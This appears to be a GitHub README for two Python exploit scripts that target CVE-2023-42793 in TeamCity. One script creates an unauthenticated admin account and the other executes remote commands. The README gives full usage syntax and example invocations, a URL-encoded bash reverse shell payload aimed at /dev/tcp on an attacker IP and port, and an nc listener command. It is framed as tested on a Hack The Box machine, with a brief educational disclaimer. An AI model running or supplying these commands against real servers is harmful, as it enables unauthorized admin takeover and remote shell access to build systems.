use exploit.py first to creat administrator account for you and then use rce.py to execute commands on the target, and for reverse shell check this

This script exploits CVE-2023-42793 to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials.

python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

• -u, --url URL: Target URL (required)
• -v, --verbose: Enable verbose mode
• -n, --username USERNAME: Specify username (default: random)
• -p, --password PASSWORD: Specify password (default: random)
• -e, --email EMAIL: Specify email (default: random)
• -t, --token-file: File to save the token

• Python 3.x
• Python libraries
  • To install the dependencies pip3 install -r requirements.txt

1. Exploit with random username, password, and email:

   python exploit.py -u http://target.com

2. Exploit with specified username, password, and email:

   python exploit.py -u http://target.com -n admin -p admin123 -e admin@example.com

Upon successful exploitation, the script prints the URL, username, and password of the created admin account then save the output in token file.

Description This script allows executing commands on a vulnerable TeamCity server exploiting CVE-2023-42793. It first enables the debug processes and then executes the specified command using the appropriate API endpoints.

python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]

• -u, --url URL : Target URL (required)
• -t, --token-file : TO specify the file containing the token
• -c, --command COMMAND: Specify command to execute (RCE)
• -P, --port PORT: Specify port (default is 80)

Exploit with a specified command:

python rce.py -u http://target.com -t token -c "whoami"

python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'

• In this command for reverse shell replace {IP} with your ip and {port} with the port you are listening on
• Creat a listener using nc for ex nc -nvlp 5555
• For more check revshells

• This script has been tested on Runner.htb from hack the box
• This script is for educational purposes only.
• Use it responsibly and only on systems you are authorized to test.

• Zyad Elsayed
  • GitHub Repository: Zyad-Elsayed
  • LinkedIn account: zyad-abdelbary
• Original Exploit for admin account: ByteHunter (Exploit-DB)

• CVE-2023-42793 Description: Official description of the CVE vulnerability.
• Exploit Database Entry: Original exploit code on Exploit Database.
• TeamCity Blog: Blog post discussing the CVE-2023-42793 vulnerability in TeamCity.
• TeamCity Documentation: Official documentation for TeamCity.